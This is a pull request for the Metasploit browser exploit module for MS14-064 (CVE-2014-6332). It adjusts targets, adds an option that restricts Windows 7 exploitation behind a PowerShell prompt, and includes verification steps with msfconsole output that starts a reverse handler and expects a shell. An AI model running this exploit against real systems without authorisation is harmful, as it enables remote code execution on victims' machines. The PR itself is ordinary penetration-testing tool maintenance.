### PR TITLE
Add more restriction on Windows 7 target for MS14-064

### DIFF
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -56,7 +56,13 @@ class Metasploit4 < Msf::Exploit::Remote
             }
           ],
           [
-            'Windows 7 SP1',
+            'Windows Vista',
+              {
+                'os_name' => OperatingSystems::Match::WINDOWS_VISTA
+              }
+          ],
+          [
+            'Windows 7',
               {
                 'os_name' => OperatingSystems::Match::WINDOWS_7
               }

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -56,9 +56,9 @@ class Metasploit4 < Msf::Exploit::Remote
             }
           ],
           [
-            'Other Windows x86',
+            'Windows 7 SP1',
               {
-                'os_name' => OperatingSystems::Match::WINDOWS,
+                'os_name' => OperatingSystems::Match::WINDOWS_7
               }
           ]
         ],
@@ -358,6 +358,11 @@ end function
   end
 
   def on_request_exploit(cli, request, target_info)
+    if get_target.name.match(OperatingSystems::Match::WINDOWS_7) && !datastore['AllowPowershellPrompt']
+      send_not_found(cli)
+      return
+    end
+
     case request.uri
     when /\.gif/
       if get_target.name =~ OperatingSystems::Match::WINDOWS_XP

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -84,6 +84,7 @@ class Metasploit4 < Msf::Exploit::Remote
       register_options(
         [
            OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
+           OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', false])
         ], self.class )
 
   end

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -56,12 +56,6 @@ class Metasploit4 < Msf::Exploit::Remote
             }
           ],
           [
-            'Windows Vista',
-              {
-                'os_name' => OperatingSystems::Match::WINDOWS_VISTA
-              }
-          ],
-          [
             'Windows 7',
               {
                 'os_name' => OperatingSystems::Match::WINDOWS_7

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -19,8 +19,9 @@ class Metasploit4 < Msf::Exploit::Remote
       'Name'           => "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
       'Description'    => %q{
         This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
-        The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
-        Windows 10, and there is no patch for Windows XP or older.
+        The vulnerability is known to affect Internet Explorer 3.0 until version 11 within
+        Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will
+        only target Windows XP and Windows 7 box due to the Powershell limitation.
 
         Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
         newer Windows systems, the exploit will try using Powershell instead.


### PR DESCRIPTION
The MS14-064 exploit requires powershell on Windows 7, but this prompt can cause BAP to hang, so we need to tone it down a bit.
## Verification
- [ ] Set up Windows XP SP3 box
- [ ] Do the following:

```
msf > use exploit/windows/browser/ms14_064_ole_code_execution 
msf exploit(ms14_064_ole_code_execution) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
msf exploit(ms14_064_ole_code_execution) > [*] Using URL: http://0.0.0.0:8080/GXK2293a1YLTWlt
[*] Local IP: http://192.168.1.64:8080/GXK2293a1YLTWlt
[*] Server started.
```
- [x] Try the exploit against Win XP, you should get a shell.
- [x] Set up a Windows 7 box
- [x] Try the same URL again
- [x] You should get a 404 (page not found)
- [x] On msfconsole, do: `jobs -K` and `sessions -K`
- [x] On msfconsole, do: `set AllowPowershellPrompt true`
- [x] Try the exploit against the Win 7 target again, this time there should be a Powershell prompt (at that point it also means you got code execution)

I tried Vista too but Vista doesn't have Powershell so no target coverage for that.
